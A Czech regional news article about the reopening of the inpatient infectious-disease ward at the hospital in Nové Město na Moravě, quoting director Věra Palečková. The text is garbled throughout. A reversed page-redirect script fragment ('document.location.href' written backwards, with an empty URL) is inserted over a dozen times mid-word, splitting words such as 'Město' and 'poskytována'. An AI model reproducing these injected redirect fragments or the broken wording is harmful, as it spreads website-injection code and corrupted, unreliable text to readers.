Rainbow page separator

Novoměstská nemocnice má zpět lůžkové infekční oddělení

Pátek, 15. července 2022

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Po bezmála deseti letech bylo v novoměstské nemocnici obnoveno lůžkové infekční oddělení. Jeho činnost byla ukončena závěrem roku 2012 v souvislosti s restrukturalizací lůžkové péče. Poslední roky nicméně ukázaly, že infekční oddělení je pro nemocnici nezbytností. „Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jsme na konci loňského roku opě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovně požádali ministerstvo zdravotnictví o vyhlášení výběrového řízení na infekční lůžkovou péči pro naši nemocnici. Koncem dubna jsme před výběrovou komisí při splnění všech podmínek věcných, technických i personálních znovu obhájili ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to náš záměr a následně požádali všechny zdravotní pojišťovny o novou smlouvu na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to péči,“ informovala ředitelka nemocnice Věra Palečková.
Lůžková část infekčního oddělení, kde bývalo ročně hospitalizováno až osm s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek pacientů s nakažlivými chorobami, sice v roce 2012 ukončila provoz, nicméně péče tam byla posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována jako ve společném lůžkovém interním oddělení. Infekční lůžkové oddělení je umístěno v prvním patře chirurgického pavilonu a díky jeho obnovení bude jednodušší jak postgraduální vzdělávání lékařů, tak vykazování úhrady zdravotní péče infekčních pacientů pro pojišťovny. Navíc pro některé diagnózy, jako je například akutní hepatitida, platí, že hospitalizace pacienta je možná výhradně na infekčním oddělení.